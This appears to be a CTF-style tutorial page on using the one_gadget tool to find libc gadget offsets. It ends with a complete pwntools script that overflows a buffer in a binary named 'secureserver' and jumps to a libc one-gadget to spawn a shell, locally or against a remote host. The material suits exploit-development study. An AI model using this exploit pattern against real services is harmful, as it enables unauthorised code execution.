Skip to content

Latest commit

 

History

History
118 lines (81 loc) · 2.57 KB

one_gadget.md

File metadata and controls

118 lines (81 loc) · 2.57 KB
description
08/25/2023

ONE_GADGET

{% embed url="https://github.com/david942j/one_gadget" %}

Installation

Install ruby-rubygems if you don't already have it:

sudo apt install ruby-rubygems

Install one_gadget:

gem install one_gadget

Usage

Find libc library:

ldd <binary>

 linux-vdso.so.1 (0x00007ffd3f71f000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7029d40000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f7029f74000)

libc library:

/lib/x86_64-linux-gnu/libc.so.6

Using one_gadget:

one_gadget /lib/x86_64-linux-gnu/libc.so.6

We end up getting a few offsets to work with

So, libc base + offset

This will be enough to get a shell under certain restraints.

You can take a look in the registers at the time of execution in gdb and see if the restraints are met and if not, you will not have success.

This script will help you with this, you will see the libc location and the offset being added to it of the gadget:

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
break *0x401179
continue
'''.format(**locals())


# Binary filename
exe = './secureserver'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Lib-c offsets, found manually (ASLR_OFF)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# POP RDI gadget (found with ropper)
ret = 0x401016
pop_rdi = 0x40120b

# How many bytes to the instruction pointer (RIP)?
padding = 72

# Payload to spawn shell
payload = flat(
    asm('nop') * padding,
    libc.address + 0xebcf8
)

# Write payload to file
write('payload', payload)

# Exploit
io.sendlineafter(b':', payload)

# Get flag/shell
io.interactive()

You can see libc.address + offset.